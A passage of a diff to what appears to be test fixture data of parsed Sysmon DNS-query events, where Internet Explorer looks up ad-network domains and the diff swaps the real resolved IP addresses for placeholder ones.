Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17836,57 +17631,57 @@ }, "answers": [ { - "data": "94.23.171.206", + "data": "89.160.20.156", "type": "A" }, { - "data": "188.165.137.78", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.128.108", + "data": "89.160.20.156", "type": "A" }, { - "data": "94.23.73.243", + "data": "89.160.20.156", "type": "A" }, { - "data": "94.23.144.220", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.228.78", + "data": "89.160.20.156", "type": "A" }, { - "data": "188.165.27.173", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.252.5", + "data": "89.160.20.156", "type": "A" }, { - "data": "188.165.4.142", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.242.60", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "94.23.171.206", - "188.165.137.78", - "87.98.128.108", - "94.23.73.243", - "94.23.144.220", - "87.98.228.78", - "188.165.27.173", - "87.98.252.5", - "188.165.4.142", - "87.98.242.60" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -17901,22 +17696,13 @@ "grey.erne.co" ], "ip": [ - "94.23.171.206", - "188.165.137.78", - "87.98.128.108", - "94.23.73.243", - "94.23.144.220", - "87.98.228.78", - "188.165.27.173", - "87.98.252.5", - "188.165.4.142", - "87.98.242.60" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313962121Z", + "ingested": "2021-12-09T13:49:44.739944400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:94.23.171.206;::ffff:188.165.137.78;::ffff:87.98.128.108;::ffff:94.23.73.243;::ffff:94.23.144.220;::ffff:87.98.228.78;::ffff:188.165.27.173;::ffff:87.98.252.5;::ffff:188.165.4.142;::ffff:87.98.242.60;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17976,15 +17762,15 @@ }, "answers": [ { - "data": "54.243.145.203", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.221.211.153", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17992,7 +17778,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -18000,7 +17786,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -18008,7 +17794,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -18016,7 +17802,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -18025,17 +17811,17 @@ } ], "resolved_ip": [ - "54.243.145.203", - "54.221.211.153", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, @@ -18051,24 +17837,23 @@ "sync.jivox.com" ], "ip": [ - "54.243.145.203", - "54.221.211.153", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313963382Z", + "ingested": "2021-12-09T13:49:44.739948300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:54.243.145.203;::ffff:54.221.211.153;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18132,51 +17917,51 @@ "type": "CNAME" }, { - "data": "207.244.121.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.1", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.196.115", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.94.20", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.12", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.65", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.199.69", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.76.83", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.197.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.108.217", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.67.99", + "data": "89.160.20.156", "type": "A" }, { @@ -18188,79 +17973,79 @@ "type": "A" }, { - "data": "108.59.4.172", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.62.117.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.4.171", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.27", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.71.67", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.70", + "data": "89.160.20.156", "type": "A" }, { - "data": "199.58.84.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.67.98", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.196.116", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.73.10", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.110.3", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.4.173", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.8", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.71.88", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.73", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.69.231", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.74", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -18268,7 +18053,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -18276,7 +18061,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -18284,7 +18069,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -18292,7 +18077,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -18300,7 +18085,7 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" }, { @@ -18308,7 +18093,7 @@ "type": "AAAA" }, { - "data": "192.42.93.30", + "data": "192.168.93.30", "type": "A" }, { @@ -18316,7 +18101,7 @@ "type": "AAAA" }, { - "data": "192.54.112.30", + "data": "192.168.112.30", "type": "A" }, { @@ -18324,7 +18109,7 @@ "type": "AAAA" }, { - "data": "192.43.172.30", + "data": "192.168.172.30", "type": "A" }, { @@ -18332,7 +18117,7 @@ "type": "AAAA" }, { - "data": "192.48.79.30", + "data": "192.168.79.30", "type": "A" }, { @@ -18341,57 +18126,57 @@ } ], "resolved_ip": [ - "207.244.121.25", - "108.59.0.1", - "162.210.196.115", - "207.244.94.20", - "108.59.0.12", - "207.244.121.65", - "162.210.199.69", - "207.244.76.83", - "162.210.197.137", - "207.244.108.217", - "207.244.121.137", - "207.244.67.99", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", "198.7.56.229", "198.7.56.231", - "108.59.4.172", - "108.62.117.43", - "108.59.4.171", - "207.244.121.27", - "207.244.71.67", - "207.244.121.70", - "199.58.84.25", - "207.244.67.98", - "162.210.196.116", - "207.244.73.10", - "207.244.110.3", - "108.59.4.173", - "108.59.0.8", - "207.244.71.88", - "207.244.121.73", - "207.244.69.231", - "108.59.0.2", - "207.244.121.74", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30", + "192.168.51.30", "2001:503:d414::30", - "192.42.93.30", + "192.168.93.30", "2001:503:eea3::30", - "192.54.112.30", + "192.168.112.30", "2001:502:8cc::30", - "192.43.172.30", + "192.168.172.30", "2001:503:39c1::30", - "192.48.79.30", + "192.168.79.30", "2001:502:7094::30" ] }, @@ -18408,64 +18193,35 @@ "b1sync.zemanta.com" ], "ip": [ - "207.244.121.25", - "108.59.0.1", - "162.210.196.115", - "207.244.94.20", - "108.59.0.12", - "207.244.121.65", - "162.210.199.69", - "207.244.76.83", - "162.210.197.137", - "207.244.108.217", - "207.244.121.137", - "207.244.67.99", + "89.160.20.156", "198.7.56.229", "198.7.56.231", - "108.59.4.172", - "108.62.117.43", - "108.59.4.171", - "207.244.121.27", - "207.244.71.67", - "207.244.121.70", - "199.58.84.25", - "207.244.67.98", - "162.210.196.116", - "207.244.73.10", - "207.244.110.3", - "108.59.4.173", - "108.59.0.8", - "207.244.71.88", - "207.244.121.73", - "207.244.69.231", - "108.59.0.2", - "207.244.121.74", - "192.5.6.30", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30", + "192.168.51.30", "2001:503:d414::30", - "192.42.93.30", + "192.168.93.30", "2001:503:eea3::30", - "192.54.112.30", + "192.168.112.30", "2001:502:8cc::30", - "192.43.172.30", + "192.168.172.30", "2001:503:39c1::30", - "192.48.79.30", + "192.168.79.30", "2001:502:7094::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313964762Z", + "ingested": "2021-12-09T13:49:44.739952900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b1-lsw-use1.zemanta.com;::ffff:207.244.121.25;::ffff:108.59.0.1;::ffff:162.210.196.115;::ffff:207.244.94.20;::ffff:108.59.0.12;::ffff:207.244.121.65;::ffff:162.210.199.69;::ffff:207.244.76.83;::ffff:162.210.197.137;::ffff:207.244.108.217;::ffff:207.244.121.137;::ffff:207.244.67.99;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:108.59.4.172;::ffff:108.62.117.43;::ffff:108.59.4.171;::ffff:207.244.121.27;::ffff:207.244.71.67;::ffff:207.244.121.70;::ffff:199.58.84.25;::ffff:207.244.67.98;::ffff:162.210.196.116;::ffff:207.244.73.10;::ffff:207.244.110.3;::ffff:108.59.4.173;::ffff:108.59.0.8;::ffff:207.244.71.88;::ffff:207.244.121.73;::ffff:207.244.69.231;::ffff:108.59.0.2;::ffff:207.244.121.74;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;2001:503:d414::30;192.42.93.30;2001:503:eea3::30;192.54.112.30;2001:502:8cc::30;192.43.172.30;2001:503:39c1::30;192.48.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b1-lsw-use1.zemanta.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;2001:503:d414::30;192.168.93.30;2001:503:eea3::30;192.168.112.30;2001:502:8cc::30;192.168.172.30;2001:503:39c1::30;192.168.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18529,55 +18285,55 @@ "type": "CNAME" }, { - "data": "124.146.215.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.53", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.46", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.52", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.48", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.45", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.54", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.47", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.42", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.55", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.56", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -18586,19 +18342,19 @@ } ], "resolved_ip": [ - "124.146.215.43", - "202.241.208.53", - "124.146.215.46", - "202.241.208.52", - "124.146.215.48", - "124.146.215.45", - "202.241.208.54", - "124.146.215.47", - "124.146.215.42", - "124.146.215.44", - "202.241.208.55", - "202.241.208.56", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, @@ -18615,26 +18371,15 @@ "tg.socdm.com" ], "ip": [ - "124.146.215.43", - "202.241.208.53", - "124.146.215.46", - "202.241.208.52", - "124.146.215.48", - "124.146.215.45", - "202.241.208.54", - "124.146.215.47", - "124.146.215.42", - "124.146.215.44", - "202.241.208.55", - "202.241.208.56", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313966071Z", + "ingested": "2021-12-09T13:49:44.739957800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 